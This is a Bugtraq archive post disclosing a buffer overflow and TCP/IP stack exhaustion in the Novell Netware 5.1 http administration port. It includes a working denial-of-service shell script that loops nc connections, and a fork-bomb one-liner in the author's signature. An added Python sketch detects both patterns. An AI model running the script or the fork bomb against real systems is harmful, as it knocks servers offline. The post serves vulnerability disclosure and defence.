Bugtraq mailing list archives
Novell Netware 5.1 (server 5.00h, Dec 11, 1999)...
From: lcamtuf () TPI PL (Michal Zalewski)
Date: Tue, 18 Apr 2000 14:29:27 +0200
Hi again. Another overflow and TCP/IP stack flaw. Affected: virtually any system running on top of the Netware system with http remote administration (including web caching solutions, BorderManager firewall and so on)...

There's a buffer overflow in the remote (http, usually on port 8008 or so) administration protocol for tcp-enabled Netware servers - it might be exploited by sending a request like that:

GET / AAAAAAAAAAAAAAAAAAAAAAAAAAA.......(something between 4 and 8kb)

The connection won't be dropped (that's a Netware TCP/IP stack problem or _feature_), but you'll get an error message on the console, sometimes with a stack dump (yes, lovely: 41 41 41 41... ;)

There are two problems with it:

1. Of course, the overflow, allowing an attacker to execute arbitrary code on the server,

2. A problem with the TCP/IP stack; there's no automatic clean-up in case of an application crash. By connecting, sending the evil request, disconnecting and connecting again for some time (usually a few thousand times is enough), the whole TCP/IP stack will be fscked up, causing the death of TCP networking (first, the server starts to refuse or immediately drops any connection, then stops responding to network requests), and, eventually, the whole server dies.

There's a simple script which, left for some time, should kill Netware TCP/IP. Please change $SERVER and $PORT for testing purposes.

-- kill_nwtcp.c --
#!/bin/sh
# Target host and http administration port (change these before testing).
SERVER=127.0.0.1
PORT=8008
# Seconds each connection is held open before it is killed.
WAIT=3
# Oversized request body: 4093 bytes of 'A' (0x41).
DUZOA=$(perl -e 'print "A"x4093')
# Number of parallel connections per round.
MAX=30

while :; do
  ILE=0
  while [ $ILE -lt $MAX ]; do
    (
      # Send "GET /", the padding line and a blank line, then drop the
      # connection without waiting for the server to clean up.
      ( echo "GET /"; echo "$DUZOA"; echo ) | nc $SERVER $PORT &
      sleep $WAIT
      kill -9 $!
    ) >/dev/null 2>&1 &
    ILE=$((ILE+1))
  done
  sleep $WAIT
done
-- EOF --

For me, Novell sells pretty good IPX solutions for local networks, but it isn't the best idea to use it as a firewall, as a system architecture based on DOS isn't good for Real Networking :(

_______________________________________________________
Michal Zalewski [lcamtuf () tpi pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
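The post describes two observable patterns: a request head containing a line thousands of bytes long, and one source opening and abandoning connections to the admin port in rapid succession. The following Python is an added detection sketch (editor's example, not code from the original post, from Michal Zalewski or from Novell) that flags both over constructed sample data. Port 8008 comes from the post; the 2 KB line cut-off, the 50-connections-in-10-seconds threshold, the function names and the sample events are assumptions chosen for illustration.

```python
"""Detection sketch for the Netware http admin-port traffic described above.

Added example, not part of the original Bugtraq post. It flags:
  1. a request head with a line far longer than any legitimate admin
     request (the overflow trigger: the PoC sends ~4 KB of 'A'), and
  2. a single source that opens and drops many connections to the admin
     port inside a short window (the stack-exhaustion loop of the PoC).
Thresholds and sample data below are assumptions for illustration.
"""
from collections import deque

ADMIN_PORT = 8008       # port named in the post
MAX_LINE_LEN = 2048     # assumed cut-off; the post says 4-8 KB triggers the fault
CHURN_WINDOW = 10.0     # assumed: seconds of sliding window
CHURN_THRESHOLD = 50    # assumed: connections per window from one source


def poc_request(padding: int) -> bytes:
    """Rebuild what the post's script sends: 'GET /', a padding line, a blank line."""
    return b"GET /\n" + b"A" * padding + b"\n\n"


def longest_head_line(raw: bytes) -> int:
    """Length of the longest line in the request head (before the first blank line)."""
    head = raw.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0]
    return max((len(line) for line in head.split(b"\n")), default=0)


def is_overflow_probe(raw: bytes, limit: int = MAX_LINE_LEN) -> bool:
    """True when any head line exceeds `limit`; the PoC's 4093-byte line trips this."""
    return longest_head_line(raw) > limit


def churn_sources(events, window: float = CHURN_WINDOW, threshold: int = CHURN_THRESHOLD):
    """Sliding-window count of admin-port connection opens per source.

    `events` is an iterable of (timestamp_seconds, src_ip, dst_port) tuples in
    time order, as a connection log would yield them. Returns a dict mapping
    each source that reached `threshold` opens inside any `window` seconds to
    its peak count.
    """
    recent = {}   # src_ip -> deque of timestamps still inside the window
    peaks = {}
    for ts, src, dport in events:
        if dport != ADMIN_PORT:
            continue
        q = recent.setdefault(src, deque())
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            peaks[src] = max(peaks.get(src, 0), len(q))
    return peaks


def sample_events():
    """Constructed connection log: one host running the PoC loop (30 connects
    every 3 s, like the script's MAX/WAIT), one host doing ordinary admin use."""
    events = []
    for batch in range(10):                       # attacker rounds
        for i in range(30):
            events.append((3.0 * batch + 0.01 * i, "10.0.0.7", ADMIN_PORT))
    for t in (0.5, 60.5, 120.5):                  # benign admin sessions
        events.append((t, "10.0.0.5", ADMIN_PORT))
    events.append((5.0, "10.0.0.5", 80))          # unrelated port, ignored
    return sorted(events)


if __name__ == "__main__":
    print("PoC request flagged:", is_overflow_probe(poc_request(4093)))
    print("normal request flagged:", is_overflow_probe(b"GET / HTTP/1.0\r\nHost: nw\r\n\r\n"))
    print("churning sources:", churn_sources(sample_events()))
```

The line-length check is deliberately applied to the whole request head rather than just the request line, because the PoC puts the padding on the line after `GET /`, where a server would read it as a header. The churn counter only looks at connection opens, so it also catches clients that connect and reset without sending anything.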
Current thread:
- Novell Netware 5.1 (server 5.00h, Dec 11, 1999)... Michal Zalewski (Apr 18)
- GNU/Linux Richard Stallman (Apr 19)
- Remote DoS attack in Real Networks Real Server Vulnerability Ussr Labs (Apr 20)
- Re: Novell Netware 5.1 (server 5.00h, Dec 11, 1999)... Roy Sigurd Karlsbakk (Apr 20)
- Cisco Security Advisory: Cisco IOS Software TELNET Option Handling Vulnerability Cisco Systems Product Security Incident Response Team (Apr 20)